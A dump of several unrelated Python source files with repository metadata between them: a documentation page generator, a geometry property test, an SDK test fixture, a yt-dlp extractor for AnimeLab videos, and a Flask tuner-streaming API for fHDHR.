raise TaskError('The config_path option must be specified, e.g., with the --config-path flag')
for config_path in self.get_options().config_path:
config = load_config(config_path)
soups = load_soups(config)
precomputed = precompute(config, soups)
transform_soups(config, soups, precomputed)
template = load_template(config)
write_en_pages(config, soups, precomputed, template)
copy_extras(config)
def load_config(json_path):
with open(json_path) as json_file:
config = json.loads(json_file.read().decode('utf8'))
# sanity-test the config:
assert(config['tree'][0]['page'] == 'index')
return config
def load_soups(config):
soups = {}
for page, path in config['sources'].items():
with open(path, 'rb') as orig_file:
soups[page] = beautiful_soup(orig_file.read().decode('utf-8'))
return soups
class Precomputed(object):
def __init__(self, page, pantsref):
self.page = page
self.pantsref = pantsref
class PrecomputedPageInfo(object):
def __init__(self, title, show_toc):
self.title = title
self.show_toc = show_toc
self.toc = []
def precompute_pantsrefs(soups):
accumulator = {}
for (page, soup) in soups.items():
existing_anchors = find_existing_anchors(soup)
count = 100
for tag in soup.find_all('a'):
if tag.has_attr('pantsmark'):
pantsmark = tag['pantsmark']
if pantsmark in accumulator:
raise TaskError('pantsmarks are unique but "{0}" appears in {1} and {2}'
.format(pantsmark, page, accumulator[pantsmark]))
# To link to a place "mid-page", we need an HTML anchor.
# If this tag already has such an anchor, use it.
# Else, make one up.
anchor = tag.get('id') or tag.get('name')
if not anchor:
anchor = pantsmark
while anchor in existing_anchors:
count += 1
anchor = '{0}_{1}'.format(pantsmark, count)
tag['id'] = anchor
existing_anchors = find_existing_anchors(soup)
link = '{0}.html
accumulator[pantsmark] = link
return accumulator
def precompute(config, soups):
show_toc = config.get('show_toc', {})
page = {}
pantsrefs = precompute_pantsrefs(soups)
for p, soup in soups.items():
title = get_title(soup) or p
page[p] = PrecomputedPageInfo(title=title, show_toc=show_toc.get(p, True))
return Precomputed(page=page, pantsref=pantsrefs)
def fixup_internal_links(config, soups):
# Pages can come from different dirs; they can go to different dirs.
# Thus, there's some relative-path-computing here.
reverse_directory = {}
for d, s in config['sources'].items():
reverse_directory[s] = d
for name, soup in soups.items():
old_src_dir = os.path.dirname(config['sources'][name])
for tag in soup.find_all(True):
if not 'href' in tag.attrs: continue
old_rel_path = tag['href'].split('#')[0]
old_dst = os.path.normpath(os.path.join(old_src_dir, old_rel_path))
if not old_dst in reverse_directory: continue
new_dst = reverse_directory[old_dst] + '.html'
new_rel_path = rel_href(name, new_dst)
tag['href'] = tag['href'].replace(old_rel_path, new_rel_path, 1)
_heading_re = re.compile('^h[1-6]$')
def rel_href(src, dst):
src_dir = os.path.dirname(src)
return os.path.relpath(dst, src_dir)
def find_existing_anchors(soup):
existing_anchors = set()
for tag in soup.find_all(True):
for attr in ['id', 'name']:
if tag.has_attr(attr):
existing_anchors.add(tag.get(attr))
return existing_anchors
def ensure_headings_linkable(soups):
for soup in soups.values():
ensure_page_headings_linkable(soup)
def ensure_page_headings_linkable(soup):
# Case-insensitve because distinguishing links #Foo and #foo would be weird.
existing_anchors = find_existing_anchors(soup)
count = 100
for tag in soup.find_all(_heading_re):
if not (tag.has_attr('id') or tag.has_attr('name')):
snippet = ''.join([c for c in tag.text if c.isalpha()])[:20]
while True:
count += 1
candidate_id = 'heading_{0}_{1}'.format(snippet, count).lower()
if not candidate_id in existing_anchors:
existing_anchors.add(candidate_id)
tag['id'] = candidate_id
break
def link_pantsrefs(soups, precomputed):
for (page, soup) in soups.items():
for a in soup.find_all('a'):
if a.has_attr('pantsref'):
pantsref = a['pantsref']
if not pantsref in precomputed.pantsref:
raise TaskError('Page {0} has pantsref "{1}" and I cannot find pantsmark for'
' it'.format(page, pantsref))
a['href'] = rel_href(page, precomputed.pantsref[pantsref])
def transform_soups(config, soups, precomputed):
fixup_internal_links(config, soups)
ensure_headings_linkable(soups)
# Do this after ensure_headings_linkable so that there will be links.
generate_page_tocs(soups, precomputed)
link_pantsrefs(soups, precomputed)
def get_title(soup):
if soup.title: return soup.title.string
if soup.h1: return soup.h1.string
return ''
def generate_site_toc(config, precomputed, here):
site_toc = []
def recurse(tree, depth_so_far):
for node in tree:
if 'collapsible_heading' in node and 'pages' in node:
heading = node['collapsible_heading']
pages = node['pages']
links = []
collapse_open = False
for cur_page in pages:
html_filename = '{}.html'.format(cur_page)
page_is_here = cur_page == here
if page_is_here:
link = html_filename
collapse_open = True
else:
link = os.path.relpath(html_filename, os.path.dirname(here))
links.append(dict(link=link, text=precomputed.page[cur_page].title, here=page_is_here))
site_toc.append(dict(depth=depth_so_far, links=links, dropdown=True, heading=heading, id=heading.replace(' ', '-'), open=collapse_open))
if 'heading' in node:
heading = node['heading']
site_toc.append(dict(depth=depth_so_far, links=None, dropdown=False, heading=heading, id=heading.replace(' ', '-')))
if 'pages' in node and not 'collapsible_heading' in node:
pages = node['pages']
links = []
for cur_page in pages:
html_filename = '{}.html'.format(cur_page)
page_is_here = cur_page == here
if page_is_here:
link = html_filename
else:
link = os.path.relpath(html_filename, os.path.dirname(here))
links.append(dict(link=link, text=precomputed.page[cur_page].title, here=page_is_here))
site_toc.append(dict(depth=depth_so_far, links=links, dropdown=False, heading=None, id=heading.replace(' ', '-')))
if 'children' in node:
recurse(node['children'], depth_so_far + 1)
if 'tree' in config:
recurse(config['tree'], 0)
return site_toc
def hdepth(tag):
if not _heading_re.search(tag.name):
raise TaskError('Can\'t compute heading depth of non-heading {0}'.format(tag))
depth = int(tag.name[1], 10)
cursor = tag
while cursor:
if cursor.name == 'section':
depth += 1
cursor = cursor.parent
return depth
def generate_page_tocs(soups, precomputed):
for name, soup in soups.items():
if precomputed.page[name].show_toc:
precomputed.page[name].toc = generate_page_toc(soup)
def generate_page_toc(soup):
found_depth_counts = collections.defaultdict(int)
for tag in soup.find_all(_heading_re):
if (tag.get('id') or tag.get('name')):
found_depth_counts[hdepth(tag)] += 1
depth_list = [i for i in range(100) if 1 < found_depth_counts[i]]
depth_list = depth_list[:4]
toc = []
for tag in soup.find_all(_heading_re):
depth = hdepth(tag)
if depth in depth_list:
toc.append(dict(depth=depth_list.index(depth) + 1,
link=tag.get('id') or tag.get('name'),
text=tag.text))
return toc
def generate_generated(config, here):
return('{0} {1}'.format(config['sources'][here],
datetime.now().isoformat()))
def render_html(dst, config, soups, precomputed, template):
soup = soups[dst]
renderer = Renderer()
title = precomputed.page[dst].title
topdots = ('../' * dst.count('/'))
if soup.body:
body_html = '{0}'.format(soup.body)
else:
body_html = '{0}'.format(soup)
html = renderer.render(template,
body_html=body_html,
generated=generate_generated(config, dst),
site_toc=generate_site_toc(config, precomputed, dst),
has_page_toc=bool(precomputed.page[dst].toc),
page_path=dst,
page_toc=precomputed.page[dst].toc,
title=title,
topdots=topdots)
return html
def write_en_pages(config, soups, precomputed, template):
outdir = config['outdir']
for dst in soups:
html = render_html(dst, config, soups, precomputed, template)
dst_path = os.path.join(outdir, dst + '.html')
dst_dir = os.path.dirname(dst_path)
if not os.path.isdir(dst_dir):
os.makedirs(dst_dir)
with open(dst_path, 'wb') as f:
f.write(html.encode('utf-8'))
def copy_extras(config):
outdir = config['outdir']
for dst, src in config['extras'].items():
dst_path = os.path.join(outdir, dst)
dst_dir = os.path.dirname(dst_path)
if not os.path.isdir(dst_dir):
os.makedirs(dst_dir)
shutil.copy(src, dst_path)
def load_template(config):
with open(config['template'], 'rb') as template_file:
template = template_file.read().decode('utf-8')
return template
| true | true |
1c2cc2599266bdbbccd6dcc6f5d4e36a7d6f337b | 498 | py | Python | tests/integration_tests/contours_tests/test_reverse.py | skrat/martinez | 86db48324cb50ecb52be8ab2e4278a6d5cdd562b | [
"MIT"
] | 7 | 2020-05-07T08:13:44.000Z | 2021-12-17T07:33:51.000Z | tests/integration_tests/contours_tests/test_reverse.py | skrat/martinez | 86db48324cb50ecb52be8ab2e4278a6d5cdd562b | [
"MIT"
] | 17 | 2019-11-29T23:17:26.000Z | 2020-12-20T15:47:17.000Z | tests/integration_tests/contours_tests/test_reverse.py | skrat/martinez | 86db48324cb50ecb52be8ab2e4278a6d5cdd562b | [
"MIT"
] | 1 | 2020-12-17T22:44:21.000Z | 2020-12-17T22:44:21.000Z | from typing import Tuple
from hypothesis import given
from tests.bind_tests.hints import BoundContour
from tests.integration_tests.utils import are_bound_ported_contours_equal
from tests.port_tests.hints import PortedContour
from . import strategies
@given(strategies.contours_pairs)
def test_basic(contours_pair: Tuple[BoundContour, PortedContour]) -> None:
bound, ported = contours_pair
bound.reverse()
ported.reverse()
assert are_bound_ported_contours_equal(bound, ported)
| 26.210526 | 74 | 0.813253 | from typing import Tuple
from hypothesis import given
from tests.bind_tests.hints import BoundContour
from tests.integration_tests.utils import are_bound_ported_contours_equal
from tests.port_tests.hints import PortedContour
from . import strategies
@given(strategies.contours_pairs)
def test_basic(contours_pair: Tuple[BoundContour, PortedContour]) -> None:
bound, ported = contours_pair
bound.reverse()
ported.reverse()
assert are_bound_ported_contours_equal(bound, ported)
| true | true |
1c2cc40caa7a9f62496b4447c40f1d27ede16221 | 984 | py | Python | sdks/bkapi-client-core/tests/conftest.py | shabbywu/bkpaas-python-sdk | a9422906707429454ff162f7e39a697260a63d6c | [
"MIT"
] | 17 | 2021-08-03T03:15:35.000Z | 2022-03-18T06:10:04.000Z | sdks/bkapi-client-core/tests/conftest.py | piglei/bkpaas-python-sdk | 3dfea8be5702ccea1228691c6c1c3e87a27238d2 | [
"MIT"
] | 7 | 2021-08-03T07:10:12.000Z | 2022-03-23T04:47:22.000Z | sdks/bkapi-client-core/tests/conftest.py | piglei/bkpaas-python-sdk | 3dfea8be5702ccea1228691c6c1c3e87a27238d2 | [
"MIT"
] | 9 | 2021-08-03T03:20:36.000Z | 2022-03-08T13:47:50.000Z | # -*- coding: utf-8 -*-
"""
* TencentBlueKing is pleased to support the open source community by making 蓝鲸智云-蓝鲸 PaaS 平台(BlueKing-PaaS) available.
* Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
* Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
* You may obtain a copy of the License at http://opensource.org/licenses/MIT
* Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
* an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
* specific language governing permissions and limitations under the License.
"""
import os
import pytest
from bkapi_client_core.config import settings
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tests.django_settings")
@pytest.fixture(autouse=True)
def core_settings():
settings.reset()
return settings
| 41 | 118 | 0.769309 |
import os
import pytest
from bkapi_client_core.config import settings
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tests.django_settings")
@pytest.fixture(autouse=True)
def core_settings():
settings.reset()
return settings
| true | true |
1c2cc47dddb6be2c5055de2dde433d58cdc9780a | 11,207 | py | Python | yt_dlp/extractor/animelab.py | jeroenj/yt-dlp | 11078c6d571673a0f09e21933f4ad1e6fcc35456 | [
"Unlicense"
] | 1 | 2022-03-26T15:43:50.000Z | 2022-03-26T15:43:50.000Z | yt_dlp/extractor/animelab.py | jeroenj/yt-dlp | 11078c6d571673a0f09e21933f4ad1e6fcc35456 | [
"Unlicense"
] | null | null | null | yt_dlp/extractor/animelab.py | jeroenj/yt-dlp | 11078c6d571673a0f09e21933f4ad1e6fcc35456 | [
"Unlicense"
] | 2 | 2022-01-05T08:23:25.000Z | 2022-03-06T21:33:37.000Z | # coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (
ExtractorError,
urlencode_postdata,
int_or_none,
str_or_none,
determine_ext,
)
from ..compat import compat_HTTPError
class AnimeLabBaseIE(InfoExtractor):
_LOGIN_URL = 'https://www.animelab.com/login'
_NETRC_MACHINE = 'animelab'
_LOGGED_IN = False
def _is_logged_in(self, login_page=None):
if not self._LOGGED_IN:
if not login_page:
login_page = self._download_webpage(self._LOGIN_URL, None, 'Downloading login page')
AnimeLabBaseIE._LOGGED_IN = 'Sign In' not in login_page
return self._LOGGED_IN
def _perform_login(self, username, password):
if self._is_logged_in():
return
login_form = {
'email': username,
'password': password,
}
try:
response = self._download_webpage(
self._LOGIN_URL, None, 'Logging in', 'Wrong login info',
data=urlencode_postdata(login_form),
headers={'Content-Type': 'application/x-www-form-urlencoded'})
except ExtractorError as e:
if isinstance(e.cause, compat_HTTPError) and e.cause.code == 400:
raise ExtractorError('Unable to log in (wrong credentials?)', expected=True)
raise
if not self._is_logged_in(response):
raise ExtractorError('Unable to login (cannot verify if logged in)')
def _real_initialize(self):
if not self._is_logged_in():
self.raise_login_required('Login is required to access any AnimeLab content')
class AnimeLabIE(AnimeLabBaseIE):
_VALID_URL = r'https?://(?:www\.)?animelab\.com/player/(?P<id>[^/]+)'
# the following tests require authentication, but a free account will suffice
# just set 'usenetrc' to true in test/local_parameters.json if you use a .netrc file
# or you can set 'username' and 'password' there
# the tests also select a specific format so that the same video is downloaded
# regardless of whether the user is premium or not (needs testing on a premium account)
_TEST = {
'url': 'https://www.animelab.com/player/fullmetal-alchemist-brotherhood-episode-42',
'md5': '05bde4b91a5d1ff46ef5b94df05b0f7f',
'info_dict': {
'id': '383',
'ext': 'mp4',
'display_id': 'fullmetal-alchemist-brotherhood-episode-42',
'title': 'Fullmetal Alchemist: Brotherhood - Episode 42 - Signs of a Counteroffensive',
'description': 'md5:103eb61dd0a56d3dfc5dbf748e5e83f4',
'series': 'Fullmetal Alchemist: Brotherhood',
'episode': 'Signs of a Counteroffensive',
'episode_number': 42,
'duration': 1469,
'season': 'Season 1',
'season_number': 1,
'season_id': '38',
},
'params': {
'format': '[format_id=21711_yeshardsubbed_ja-JP][height=480]',
},
'skip': 'All AnimeLab content requires authentication',
}
def _real_extract(self, url):
display_id = self._match_id(url)
# unfortunately we can get different URLs for the same formats
# e.g. if we are using a "free" account so no dubs available
# (so _remove_duplicate_formats is not effective)
# so we use a dictionary as a workaround
formats = {}
for language_option_url in ('https://www.animelab.com/player/%s/subtitles',
'https://www.animelab.com/player/%s/dubbed'):
actual_url = language_option_url % display_id
webpage = self._download_webpage(actual_url, display_id, 'Downloading URL ' + actual_url)
video_collection = self._parse_json(self._search_regex(r'new\s+?AnimeLabApp\.VideoCollection\s*?\((.*?)\);', webpage, 'AnimeLab VideoCollection'), display_id)
position = int_or_none(self._search_regex(r'playlistPosition\s*?=\s*?(\d+)', webpage, 'Playlist Position'))
raw_data = video_collection[position]['videoEntry']
video_id = str_or_none(raw_data['id'])
# create a title from many sources (while grabbing other info)
# TODO use more fallback sources to get some of these
series = raw_data.get('showTitle')
video_type = raw_data.get('videoEntryType', {}).get('name')
episode_number = raw_data.get('episodeNumber')
episode_name = raw_data.get('name')
title_parts = (series, video_type, episode_number, episode_name)
if None not in title_parts:
title = '%s - %s %s - %s' % title_parts
else:
title = episode_name
description = raw_data.get('synopsis') or self._og_search_description(webpage, default=None)
duration = int_or_none(raw_data.get('duration'))
thumbnail_data = raw_data.get('images', [])
thumbnails = []
for thumbnail in thumbnail_data:
for instance in thumbnail['imageInstances']:
image_data = instance.get('imageInfo', {})
thumbnails.append({
'id': str_or_none(image_data.get('id')),
'url': image_data.get('fullPath'),
'width': image_data.get('width'),
'height': image_data.get('height'),
})
season_data = raw_data.get('season', {}) or {}
season = str_or_none(season_data.get('name'))
season_number = int_or_none(season_data.get('seasonNumber'))
season_id = str_or_none(season_data.get('id'))
for video_data in raw_data['videoList']:
current_video_list = {}
current_video_list['language'] = video_data.get('language', {}).get('languageCode')
is_hardsubbed = video_data.get('hardSubbed')
for video_instance in video_data['videoInstances']:
httpurl = video_instance.get('httpUrl')
url = httpurl if httpurl else video_instance.get('rtmpUrl')
if url is None:
# this video format is unavailable to the user (not premium etc.)
continue
current_format = current_video_list.copy()
format_id_parts = []
format_id_parts.append(str_or_none(video_instance.get('id')))
if is_hardsubbed is not None:
if is_hardsubbed:
format_id_parts.append('yeshardsubbed')
else:
format_id_parts.append('nothardsubbed')
format_id_parts.append(current_format['language'])
format_id = '_'.join([x for x in format_id_parts if x is not None])
ext = determine_ext(url)
if ext == 'm3u8':
for format_ in self._extract_m3u8_formats(
url, video_id, m3u8_id=format_id, fatal=False):
formats[format_['format_id']] = format_
continue
elif ext == 'mpd':
for format_ in self._extract_mpd_formats(
url, video_id, mpd_id=format_id, fatal=False):
formats[format_['format_id']] = format_
continue
current_format['url'] = url
quality_data = video_instance.get('videoQuality')
if quality_data:
quality = quality_data.get('name') or quality_data.get('description')
else:
quality = None
height = None
if quality:
height = int_or_none(self._search_regex(r'(\d+)p?$', quality, 'Video format height', default=None))
if height is None:
self.report_warning('Could not get height of video')
else:
current_format['height'] = height
current_format['format_id'] = format_id
formats[current_format['format_id']] = current_format
formats = list(formats.values())
self._sort_formats(formats)
return {
'id': video_id,
'display_id': display_id,
'title': title,
'description': description,
'series': series,
'episode': episode_name,
'episode_number': int_or_none(episode_number),
'thumbnails': thumbnails,
'duration': duration,
'formats': formats,
'season': season,
'season_number': season_number,
'season_id': season_id,
}
class AnimeLabShowsIE(AnimeLabBaseIE):
_VALID_URL = r'https?://(?:www\.)?animelab\.com/shows/(?P<id>[^/]+)'
_TEST = {
'url': 'https://www.animelab.com/shows/attack-on-titan',
'info_dict': {
'id': '45',
'title': 'Attack on Titan',
'description': 'md5:989d95a2677e9309368d5cf39ba91469',
},
'playlist_count': 59,
'skip': 'All AnimeLab content requires authentication',
}
def _real_extract(self, url):
_BASE_URL = 'http://www.animelab.com'
_SHOWS_API_URL = '/api/videoentries/show/videos/'
display_id = self._match_id(url)
webpage = self._download_webpage(url, display_id, 'Downloading requested URL')
show_data_str = self._search_regex(r'({"id":.*}),\svideoEntry', webpage, 'AnimeLab show data')
show_data = self._parse_json(show_data_str, display_id)
show_id = str_or_none(show_data.get('id'))
title = show_data.get('name')
description = show_data.get('shortSynopsis') or show_data.get('longSynopsis')
entries = []
for season in show_data['seasons']:
season_id = season['id']
get_data = urlencode_postdata({
'seasonId': season_id,
'limit': 1000,
})
# despite using urlencode_postdata, we are sending a GET request
target_url = _BASE_URL + _SHOWS_API_URL + show_id + "?" + get_data.decode('utf-8')
response = self._download_webpage(
target_url,
None, 'Season id %s' % season_id)
season_data = self._parse_json(response, display_id)
for video_data in season_data['list']:
entries.append(self.url_result(
_BASE_URL + '/player/' + video_data['slug'], 'AnimeLab',
str_or_none(video_data.get('id')), video_data.get('name')
))
return {
'_type': 'playlist',
'id': show_id,
'title': title,
'description': description,
'entries': entries,
}
# TODO implement myqueue
| 40.168459 | 170 | 0.563309 |
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (
ExtractorError,
urlencode_postdata,
int_or_none,
str_or_none,
determine_ext,
)
from ..compat import compat_HTTPError
class AnimeLabBaseIE(InfoExtractor):
_LOGIN_URL = 'https://www.animelab.com/login'
_NETRC_MACHINE = 'animelab'
_LOGGED_IN = False
def _is_logged_in(self, login_page=None):
if not self._LOGGED_IN:
if not login_page:
login_page = self._download_webpage(self._LOGIN_URL, None, 'Downloading login page')
AnimeLabBaseIE._LOGGED_IN = 'Sign In' not in login_page
return self._LOGGED_IN
def _perform_login(self, username, password):
if self._is_logged_in():
return
login_form = {
'email': username,
'password': password,
}
try:
response = self._download_webpage(
self._LOGIN_URL, None, 'Logging in', 'Wrong login info',
data=urlencode_postdata(login_form),
headers={'Content-Type': 'application/x-www-form-urlencoded'})
except ExtractorError as e:
if isinstance(e.cause, compat_HTTPError) and e.cause.code == 400:
raise ExtractorError('Unable to log in (wrong credentials?)', expected=True)
raise
if not self._is_logged_in(response):
raise ExtractorError('Unable to login (cannot verify if logged in)')
def _real_initialize(self):
if not self._is_logged_in():
self.raise_login_required('Login is required to access any AnimeLab content')
class AnimeLabIE(AnimeLabBaseIE):
_VALID_URL = r'https?://(?:www\.)?animelab\.com/player/(?P<id>[^/]+)'
_TEST = {
'url': 'https://www.animelab.com/player/fullmetal-alchemist-brotherhood-episode-42',
'md5': '05bde4b91a5d1ff46ef5b94df05b0f7f',
'info_dict': {
'id': '383',
'ext': 'mp4',
'display_id': 'fullmetal-alchemist-brotherhood-episode-42',
'title': 'Fullmetal Alchemist: Brotherhood - Episode 42 - Signs of a Counteroffensive',
'description': 'md5:103eb61dd0a56d3dfc5dbf748e5e83f4',
'series': 'Fullmetal Alchemist: Brotherhood',
'episode': 'Signs of a Counteroffensive',
'episode_number': 42,
'duration': 1469,
'season': 'Season 1',
'season_number': 1,
'season_id': '38',
},
'params': {
'format': '[format_id=21711_yeshardsubbed_ja-JP][height=480]',
},
'skip': 'All AnimeLab content requires authentication',
}
def _real_extract(self, url):
display_id = self._match_id(url)
formats = {}
for language_option_url in ('https://www.animelab.com/player/%s/subtitles',
'https://www.animelab.com/player/%s/dubbed'):
actual_url = language_option_url % display_id
webpage = self._download_webpage(actual_url, display_id, 'Downloading URL ' + actual_url)
video_collection = self._parse_json(self._search_regex(r'new\s+?AnimeLabApp\.VideoCollection\s*?\((.*?)\);', webpage, 'AnimeLab VideoCollection'), display_id)
position = int_or_none(self._search_regex(r'playlistPosition\s*?=\s*?(\d+)', webpage, 'Playlist Position'))
raw_data = video_collection[position]['videoEntry']
video_id = str_or_none(raw_data['id'])
series = raw_data.get('showTitle')
video_type = raw_data.get('videoEntryType', {}).get('name')
episode_number = raw_data.get('episodeNumber')
episode_name = raw_data.get('name')
title_parts = (series, video_type, episode_number, episode_name)
if None not in title_parts:
title = '%s - %s %s - %s' % title_parts
else:
title = episode_name
description = raw_data.get('synopsis') or self._og_search_description(webpage, default=None)
duration = int_or_none(raw_data.get('duration'))
thumbnail_data = raw_data.get('images', [])
thumbnails = []
for thumbnail in thumbnail_data:
for instance in thumbnail['imageInstances']:
image_data = instance.get('imageInfo', {})
thumbnails.append({
'id': str_or_none(image_data.get('id')),
'url': image_data.get('fullPath'),
'width': image_data.get('width'),
'height': image_data.get('height'),
})
season_data = raw_data.get('season', {}) or {}
season = str_or_none(season_data.get('name'))
season_number = int_or_none(season_data.get('seasonNumber'))
season_id = str_or_none(season_data.get('id'))
for video_data in raw_data['videoList']:
current_video_list = {}
current_video_list['language'] = video_data.get('language', {}).get('languageCode')
is_hardsubbed = video_data.get('hardSubbed')
for video_instance in video_data['videoInstances']:
httpurl = video_instance.get('httpUrl')
url = httpurl if httpurl else video_instance.get('rtmpUrl')
if url is None:
continue
current_format = current_video_list.copy()
format_id_parts = []
format_id_parts.append(str_or_none(video_instance.get('id')))
if is_hardsubbed is not None:
if is_hardsubbed:
format_id_parts.append('yeshardsubbed')
else:
format_id_parts.append('nothardsubbed')
format_id_parts.append(current_format['language'])
format_id = '_'.join([x for x in format_id_parts if x is not None])
ext = determine_ext(url)
if ext == 'm3u8':
for format_ in self._extract_m3u8_formats(
url, video_id, m3u8_id=format_id, fatal=False):
formats[format_['format_id']] = format_
continue
elif ext == 'mpd':
for format_ in self._extract_mpd_formats(
url, video_id, mpd_id=format_id, fatal=False):
formats[format_['format_id']] = format_
continue
current_format['url'] = url
quality_data = video_instance.get('videoQuality')
if quality_data:
quality = quality_data.get('name') or quality_data.get('description')
else:
quality = None
height = None
if quality:
height = int_or_none(self._search_regex(r'(\d+)p?$', quality, 'Video format height', default=None))
if height is None:
self.report_warning('Could not get height of video')
else:
current_format['height'] = height
current_format['format_id'] = format_id
formats[current_format['format_id']] = current_format
formats = list(formats.values())
self._sort_formats(formats)
return {
'id': video_id,
'display_id': display_id,
'title': title,
'description': description,
'series': series,
'episode': episode_name,
'episode_number': int_or_none(episode_number),
'thumbnails': thumbnails,
'duration': duration,
'formats': formats,
'season': season,
'season_number': season_number,
'season_id': season_id,
}
class AnimeLabShowsIE(AnimeLabBaseIE):
_VALID_URL = r'https?://(?:www\.)?animelab\.com/shows/(?P<id>[^/]+)'
_TEST = {
'url': 'https://www.animelab.com/shows/attack-on-titan',
'info_dict': {
'id': '45',
'title': 'Attack on Titan',
'description': 'md5:989d95a2677e9309368d5cf39ba91469',
},
'playlist_count': 59,
'skip': 'All AnimeLab content requires authentication',
}
def _real_extract(self, url):
_BASE_URL = 'http://www.animelab.com'
_SHOWS_API_URL = '/api/videoentries/show/videos/'
display_id = self._match_id(url)
webpage = self._download_webpage(url, display_id, 'Downloading requested URL')
show_data_str = self._search_regex(r'({"id":.*}),\svideoEntry', webpage, 'AnimeLab show data')
show_data = self._parse_json(show_data_str, display_id)
show_id = str_or_none(show_data.get('id'))
title = show_data.get('name')
description = show_data.get('shortSynopsis') or show_data.get('longSynopsis')
entries = []
for season in show_data['seasons']:
season_id = season['id']
get_data = urlencode_postdata({
'seasonId': season_id,
'limit': 1000,
})
target_url = _BASE_URL + _SHOWS_API_URL + show_id + "?" + get_data.decode('utf-8')
response = self._download_webpage(
target_url,
None, 'Season id %s' % season_id)
season_data = self._parse_json(response, display_id)
for video_data in season_data['list']:
entries.append(self.url_result(
_BASE_URL + '/player/' + video_data['slug'], 'AnimeLab',
str_or_none(video_data.get('id')), video_data.get('name')
))
return {
'_type': 'playlist',
'id': show_id,
'title': title,
'description': description,
'entries': entries,
}
| true | true |
1c2cc70c8a4b2ec67143b45dcd2223f54ae38d97 | 6,369 | py | Python | fHDHR_web/api/tuners.py | deathbybandaid/fHDHR_NewsOn | 06d205a3ca677b88fa93b9b7503465aed1838c6b | [
"WTFPL"
] | 2 | 2021-11-21T18:45:35.000Z | 2022-01-11T16:11:48.000Z | fHDHR_web/api/tuners.py | deathbybandaid/fHDHR_NewsOn | 06d205a3ca677b88fa93b9b7503465aed1838c6b | [
"WTFPL"
] | null | null | null | fHDHR_web/api/tuners.py | deathbybandaid/fHDHR_NewsOn | 06d205a3ca677b88fa93b9b7503465aed1838c6b | [
"WTFPL"
] | null | null | null | from flask import Response, request, redirect, abort, stream_with_context, session
import urllib.parse
import uuid
import json
from fHDHR.exceptions import TunerError
class Tuners():
endpoints = ["/api/tuners"]
endpoint_name = "api_tuners"
endpoint_methods = ["GET", "POST"]
def __init__(self, fhdhr):
self.fhdhr = fhdhr
def __call__(self, *args):
return self.get(*args)
def get(self, *args):
client_address = request.remote_addr
accessed_url = request.args.get('accessed', default=request.url, type=str)
method = request.args.get('method', default=self.fhdhr.config.dict["fhdhr"]["stream_type"], type=str)
tuner_number = request.args.get('tuner', None, type=str)
redirect_url = request.args.get('redirect', default=None, type=str)
if method in ["direct", "ffmpeg", "vlc"]:
channel_number = request.args.get('channel', None, type=str)
if not channel_number:
return "Missing Channel"
if str(channel_number) not in [str(x) for x in self.fhdhr.device.channels.get_channel_list("number")]:
response = Response("Not Found", status=404)
response.headers["X-fHDHR-Error"] = "801 - Unknown Channel"
self.fhdhr.logger.error(response.headers["X-fHDHR-Error"])
abort(response)
channel_dict = self.fhdhr.device.channels.get_channel_dict("number", channel_number)
if not channel_dict["enabled"]:
response = Response("Service Unavailable", status=503)
response.headers["X-fHDHR-Error"] = str("806 - Tune Failed")
self.fhdhr.logger.error(response.headers["X-fHDHR-Error"])
abort(response)
duration = request.args.get('duration', default=0, type=int)
transcode = request.args.get('transcode', default=None, type=str)
valid_transcode_types = [None, "heavy", "mobile", "internet720", "internet480", "internet360", "internet240"]
if transcode not in valid_transcode_types:
response = Response("Service Unavailable", status=503)
response.headers["X-fHDHR-Error"] = "802 - Unknown Transcode Profile"
self.fhdhr.logger.error(response.headers["X-fHDHR-Error"])
abort(response)
stream_args = {
"channel": channel_number,
"method": method,
"duration": duration,
"transcode": transcode,
"accessed": accessed_url,
"client": client_address,
"client_id": str(client_address) + "_" + str(uuid.uuid4())
}
try:
if not tuner_number:
tunernum = self.fhdhr.device.tuners.first_available(channel_number)
else:
tunernum = self.fhdhr.device.tuners.tuner_grab(tuner_number, channel_number)
except TunerError as e:
self.fhdhr.logger.info("A %s stream request for channel %s was rejected due to %s"
% (stream_args["method"], str(stream_args["channel"]), str(e)))
response = Response("Service Unavailable", status=503)
response.headers["X-fHDHR-Error"] = str(e)
self.fhdhr.logger.error(response.headers["X-fHDHR-Error"])
abort(response)
tuner = self.fhdhr.device.tuners.tuners[str(tunernum)]
try:
stream_args = self.fhdhr.device.tuners.get_stream_info(stream_args)
except TunerError as e:
self.fhdhr.logger.info("A %s stream request for channel %s was rejected due to %s"
% (stream_args["method"], str(stream_args["channel"]), str(e)))
response = Response("Service Unavailable", status=503)
response.headers["X-fHDHR-Error"] = str(e)
self.fhdhr.logger.error(response.headers["X-fHDHR-Error"])
tuner.close()
abort(response)
self.fhdhr.logger.info("Tuner #" + str(tunernum) + " to be used for stream.")
tuner.set_status(stream_args)
session["tuner_used"] = tunernum
if stream_args["method"] == "direct":
return Response(tuner.get_stream(stream_args, tuner), content_type=stream_args["content_type"], direct_passthrough=True)
elif stream_args["method"] in ["ffmpeg", "vlc"]:
return Response(stream_with_context(tuner.get_stream(stream_args, tuner)), mimetype=stream_args["content_type"])
elif method == "close":
if not tuner_number or str(tuner_number) not in list(self.fhdhr.device.tuners.tuners.keys()):
return "%s Invalid tuner" % str(tuner_number)
session["tuner_used"] = tuner_number
tuner = self.fhdhr.device.tuners.tuners[str(tuner_number)]
tuner.close()
elif method == "scan":
if not tuner_number:
tunernum = self.fhdhr.device.tuners.first_available(None)
else:
tunernum = self.fhdhr.device.tuners.tuner_grab(tuner_number, None)
tuner = self.fhdhr.device.tuners.tuners[str(tunernum)]
tuner.channel_scan(grabbed=True)
elif method == "status":
if not tuner_number:
tuner_status = self.fhdhr.device.tuners.status()
elif str(tuner_number) in list(self.fhdhr.device.tuners.tuners.keys()):
tuner_status = self.fhdhr.device.tuners.tuners[str(tuner_number)].get_status()
else:
tuner_status = ["Invalid Tuner %s" % tuner_number]
tuner_status_json = json.dumps(tuner_status, indent=4)
return Response(status=200,
response=tuner_status_json,
mimetype='application/json')
else:
return "%s Invalid Method" % method
if redirect_url:
return redirect(redirect_url + "?retmessage=" + urllib.parse.quote("%s Success" % method))
else:
return "%s Success" % method
